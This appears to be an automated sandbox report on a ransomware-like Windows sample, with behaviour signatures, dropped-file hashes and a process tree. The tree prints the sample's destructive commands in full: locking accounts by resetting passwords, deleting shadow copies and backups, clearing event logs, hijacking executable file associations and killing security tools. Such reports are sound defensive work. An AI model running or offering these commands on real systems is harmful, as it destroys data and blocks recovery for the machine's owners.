Analysis
-
max time kernel
1802s -
max time network
1820s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
18-04-2024 18:50
General
-
Target
9c80067790a910e99831e1c546fd569fb273cb34db2710fe99281d1c53475795.exe
-
Size
1.3MB
-
MD5
22a975eb038011095e8b9ff9a3078ffa
-
SHA1
f2762fb4a819dad55daf7ae3f9e96753f04df94c
-
SHA256
9c80067790a910e99831e1c546fd569fb273cb34db2710fe99281d1c53475795
-
SHA512
6cecf00b511ac39acf1b5920996b920787e13c6fbc9cc3fe46526c044f0d6813da55ee88205b8138033b55915ae6fd31c1149bef07b3116cb2459de017334a52
-
SSDEEP
24576:qI0Clbs7Kjsbs0pwKR1aQ9qVLUOHkXzWsfI9mO35s8RI93VZ4+nnI6i207pCS1Rp:oClbs7Kjsbs0pdR199qVLUOHkDWsfimT
Malware Config
Signatures
-
Clears Windows event logs 1 TTPs 3 IoCs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Drops startup file 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 30 IoCs
-
Drops autorun.inf file 1 TTPs 2 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
-
Drops file in Program Files directory 64 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 2 IoCs
-
Modifies registry class 27 IoCs
-
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\9c80067790a910e99831e1c546fd569fb273cb34db2710fe99281d1c53475795.exe"C:\Users\Admin\AppData\Local\Temp\9c80067790a910e99831e1c546fd569fb273cb34db2710fe99281d1c53475795.exe"1⤵
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cmd.exe /c net users %username% LOCKEDBYROZBEH2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net users Admin LOCKEDBYROZBEH3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet users Admin LOCKEDBYROZBEH4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 users Admin LOCKEDBYROZBEH5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cmd.exe /c net users Administrator LOCKEDBYROZBEH2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net users Administrator LOCKEDBYROZBEH3⤵
-
C:\Windows\SysWOW64\net.exenet users Administrator LOCKEDBYROZBEH4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 users Administrator LOCKEDBYROZBEH5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cmd.exe /c net user %username% LOCKEDBYROZBEH2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net user Admin LOCKEDBYROZBEH3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet user Admin LOCKEDBYROZBEH4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Admin LOCKEDBYROZBEH5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cmd.exe /c net user Administrator LOCKEDBYROZBEH2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net user Administrator LOCKEDBYROZBEH3⤵
-
C:\Windows\SysWOW64\net.exenet user Administrator LOCKEDBYROZBEH4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Administrator LOCKEDBYROZBEH5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cmd.exe /c bcdedit /set {default} recoveryenabled No2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c bcdedit /set {default} recoveryenabled No3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cmd.exe /c vssadmin delete shadows /all /quiet2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet3⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP deleteOldest2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP deleteOldest3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cmd.exe /c wbadmin delete catalog quiet2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c wbadmin delete catalog quiet3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cmd.exe /c wevtutil cl system2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c wevtutil cl system3⤵
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl system4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cmd.exe /c wevtutil cl security2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c wevtutil cl security3⤵
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl security4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cmd.exe /c wevtutil cl application2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c wevtutil cl application3⤵
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl application4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cmd.exe /c wmic SHADOWCOPY /nointeractive2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c wmic SHADOWCOPY /nointeractive3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic SHADOWCOPY /nointeractive4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cmd.exe /c wmic shadowcopy delete2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c wmic shadowcopy delete3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cmd.exe /c assoc .lnk=NoBitchesFile && assoc .exe=NoBitchesFile && assoc .js=NoBitchesFile && assoc .dll=NoBitchesFile && assoc .vbs=NoBitchesFile && assoc .vbe=NoBitchesFile && assoc .ps1=NoBitchesFile && assoc .com=NoBitchesFile && assoc .bat=NoBitchesFile && assoc .cmd=NoBitchesFile && assoc .rb=NoBitchesFile && assoc .pl=NoBitchesFile && assoc .jar=NoBitchesFile2⤵
- Modifies registry class
-
C:\Windows\SysWOW64\cmd.execmd.exe /c assoc .lnk=NoBitchesFile3⤵
- Modifies registry class
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cmd.exe /c taskkill /im ComboCleaner.exe /f2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /im ComboCleaner.exe /f3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ComboCleaner.exe /f4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cmd.exe /c echo ^[autorun^] > ..\autorun.inf2⤵
- Drops autorun.inf file
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cmd.exe /c echo open^=WindowsScan^.exe >> ..\autorun.inf2⤵
- Drops autorun.inf file
-
C:\Windows\SysWOW64\cmd.execmd.exe /c echo open=WindowsScan.exe3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cmd.exe /c netsh Interface Set Interface Wi-Fi 12 disable2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c netsh Interface Set Interface Wi-Fi 12 disable3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Interface Set Interface Wi-Fi 12 disable4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C cmd.exe /c taskkill /im chrome.exe /f && taskkill /im WireShark.exe /f && taskkill /im MSASCUI.exe /f && taskkill /im taskmgr.exe /f && taskkill /im regedit.exe /f && taskkill /im Kaspersky.exe /f && taskkill /im msseces.exe /f && taskkill /im nod32.exe /f && taskkill /im msmpeng.exe /f && taskkill /im navapsvc.exe /f && taskkill /im avkwctl.exe /f && taskkill /im fsav32.exe /f2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /im chrome.exe /f3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im chrome.exe /f4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\System32\cmd.exe2⤵
- Modifies registry class
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.0MB
MD53a949282b9bd8443e76f68e667b7b280
SHA1cde9e9a24a5d4f936ce31f136f24dbfb416dd64c
SHA2561a45650e297d7cf85a29227137c7fd7524949de980a0543b8acb6dad8955a388
SHA512ac09f26b016510736287ba842c89a2a53f602ed225defb5ea2aaed5c40eca8ea0d481d3fb6e691dc95db33897b62c81434cf4a05cf4a8304d97316c55523e070
-
Filesize
267KB
MD547cfb05bb17a6c2d9e6948f12f8ed7e5
SHA145bf92c7bf1eb6e829294a197da05b6618fd7e7f
SHA2567811d4a1e9c5eb3de6aa0dc59c0215e804376a93a719ead6bc2a09b23d77542b
SHA5123ddef21ab2d30c460f6cff21e80bea4ce237b22047994042ce8329f7fa375e69f3a7d942e62e2425b2fc40b16f058b129058559f0f3bbcee77802473bb7e7abf
-
Filesize
341KB
MD58b82a5fa188385ba27dbb6e3358961c2
SHA1850d92e914a330494c9c8e9bfff17898235d7e59
SHA256fbc1a6e137181a8a3d7cbbb16c6a5db2b3f4797a5f25ce125ab995f932c0a889
SHA51286f9574078df5dfa5f577c4f4508fe9b839d8afe9ba697d2b275d2996529a4bdb591f3850c0b0ef2f0d11e846569af87cd0e191a6b15a86ded9e684371a099ae
-
Filesize
344B
MD5033fca8035f852d1793445e2d440d7b9
SHA109064f46b4d7f9ca01d0d82b5b45678fa35d48be
SHA25667eea18fc9c7192a93c070b80f350ebb78a6beae1453f03122a71539c6b97de7
SHA5126cee0c203132566a00f26765c2943a30a44a91902993b2a09df36ad3f1e7911098283846009587d8f03504a3cd0f037f83d390f81a47c29a2d8acfe1574e2418
-
Filesize
224B
MD54961d1e19970c262cd928df897b91b40
SHA177444883f212ace904b4c01697a83e89ea0dad16
SHA25689c902d0e13a37432ad05cc21bd8689f965d2db1d2397b5f57bc4a12a403fa79
SHA512450f671dc9fcb622647f7b03368ab9b520a09f8fe3e2fac6bd10930d37debf9e706466e48a2024bf91506223192d3b68b2a9cea7a2436889780f24a5e8c101b7
-
Filesize
120B
MD5cecd79c476fb755bff8d1dee43656e4d
SHA18092eb7a3e05185450e795f562ed902679f312db
SHA2561168cd10acfa58ef0cd941ac81d8c238edd301afc0137fbc4f46549d6bb64e75
SHA512bcdc6d22193c682c34091a96bf253299a0d97a7169f93cc63a382b9a50ebd71976078d3958102c7b7cebaa5b7062963984ad921a74d7c84342396babc2cc2ea0
-
Filesize
120B
MD51121e293cab5d0255a2e591718999ba8
SHA1585e3b820b503d92c27576f534b05e99c96685cb
SHA256aaac01ec688c0bb00d15ae21786fb72f423e388dfd14bb5245803bca3d208460
SHA512f5231f5869a732575a047fcbc719244b322faa8783a814b275bf0afbc764a83489e1d60b7cf6004d68af01ac0acc0141e9458ae7394ced13a5a9fc07f0cc7a58
-
Filesize
192B
MD5ce384af0fd3ec8a8979f63e3b1a1014a
SHA1eed8c02b3bc34069358d6a0923f4c83a32a61479
SHA2566ff9cd8ee458e2217354683615ea2c3540b0c9866de593533432995855a13537
SHA5124ad2d6d1faf25f54d6a0a3c90f668b2635a9a90c48a0079730e6f4b712f91de1828eb8ea77f5335a3ece4795afbe3bf00d53c9eb1969ea7214242f9909f41423
-
Filesize
504B
MD510f34180a5eba783355578e6d806479a
SHA19bef16dd8c5ccdc82542952075c79cedbcd3a9c8
SHA2562008f8f5f230b707bca296197d90b96bc0304e3a6d58798a0f4f6f097b54ecd1
SHA512ef0c7c5dd14a138eb1758e254410bd8b7a69050ca54d0271f68064b068bd5b0c1f6de728aa04f56effa5523623d42af9f2890c3d435e93c7789faa54fe077991
-
Filesize
1KB
MD53525e4a86067894b8540fc34046f6d25
SHA1a49a5ea719063ea7005720dd885ce947d66930ce
SHA256d640c97cdac506116754e195ce8cf16f1e7a580564f047e13ca9ada862b6d01c
SHA5120cc954960ca7820ee12c44190a51743ada9a7793a1a49a3b288d4180cd513b3add9c5f21386a62a48d248802c76a2fb766c40a490d85010036fecd5a61ac2ebd
-
Filesize
808B
MD5a0692882d5675eb699ac8ccf27803d5b
SHA1a09c71f907fdade3d714aa0259c82ca2ad9e3cab
SHA2560131a47810d3e6d5ecbcb359f24b4c5dd086fc07522b9c1af0a63398aaa58ac9
SHA512974ba90868d41a62d15970097ff951d3b406a32639006c3d3e22180f7b51f8392150117e2ff83a1cd563355a4516e7d084e6a46b741a9203c8475b76cf2d7cd1
-
Filesize
1.4MB
MD58dbef05dc88644417e1f976f66cb86cf
SHA1c06b89c118bd729962e1e8e5bff316d0695cf600
SHA256d5d561db029d1a61c5a213ae2d408b9e5b48e9c7d29617b2d9714b9b7ff84e9b
SHA512f3e324ee1043244880a86f31b0adaf7934830508cb3a5334a59fa7a1e92d519cf8f17e73149aa97220afe687989da031cc7cc137aebd17c943bbee4ec627f7cf
-
Filesize
8B
MD56c8b2128eae4d17dc492a9c5b0a2f415
SHA15bbfb3928ff233478cc5622972b5db1f854cc067
SHA256f887f9f5a73df0856e068e5cb0938586d02eee687acec8ed9fedb8e9df10e9eb
SHA5126096d485041c55c9f6901f9b90dba86b15b4107ea907ba7c06a29280dc674fd30fbfed4ab5abd046b569534ed160309848b9ea206ec6780281abc5bea073bfb6
-
Filesize
48KB
MD5bc3769413689289353ec9c706cf14193
SHA1609f3a77422f7171b80de3d6b4dfc242ab9104e7
SHA25645e21afcb69bd024c4f8e26e6f02c4febc75005f3c374644a3260ee28d5c51ad
SHA512b7526391d7a26eb76720351472a2203510643937b6a79a5539ffbefef77efd2eeec38993ebbb984ef30e2138bc2b7463611be7270c10e384020a21292a29feef
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
1.4MB
-
Filesize
256KB
-
Filesize
6.9MB
-
Filesize
256KB
-
Filesize
6.9MB
